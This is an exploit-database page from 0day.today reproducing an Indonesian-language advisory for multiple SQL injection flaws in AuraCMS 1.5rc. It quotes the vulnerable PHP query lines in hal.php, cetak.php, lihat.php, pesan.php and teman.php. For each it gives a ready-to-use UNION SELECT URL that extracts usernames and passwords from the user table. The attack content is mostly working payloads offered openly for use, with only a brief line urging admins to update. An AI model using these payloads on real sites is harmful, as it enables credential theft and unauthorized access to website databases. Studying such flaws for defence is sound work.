0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AuraCMS 1.5rc Multiple Remote SQL Injection Vulnerabilities
=========================================================== AuraCMS 1.5rc Multiple Remote SQL Injection Vulnerabilities =========================================================== ######################################################################## # AuraCMS version 1.5rc - Multiple Remote SQL Injection Vulnerabilities # Vendor : http://www.auracms.org/ # Ditemukan oleh : k1tk4t # Lokasi : Indonesia ######################################################################## // Kutu pada berkas 'hal.php' baris-7 $perintah="SELECT * FROM halaman WHERE id=$id"; $hasil = mysql_query( $perintah ); --> $id tidak ter'filter'sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/* // Kutu pada berkas 'cetak.php' baris-7 $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); --> $id tidak ter'filter'sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user/* // Kutu pada berkas 'lihat.php' baris-7 $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); --> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user/* // Kutu pada berkas 'pesan.php' baris-7 $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; } else { $perintah="SELECT * FROM komentar WHERE id=$id"; --> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user/* // Kutu pada berkas 'teman.php' baris-6 $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); --> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/* ######################################################################## !!! Mohon maaf untuk webadmin mohon di update ke AuraCMS versi terbaru !!! ######################################################################## Terimakasih untuk; str0ke, DNX xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank dan semua temen2 komunitas security&hacking # 0day.today [2024-07-05] #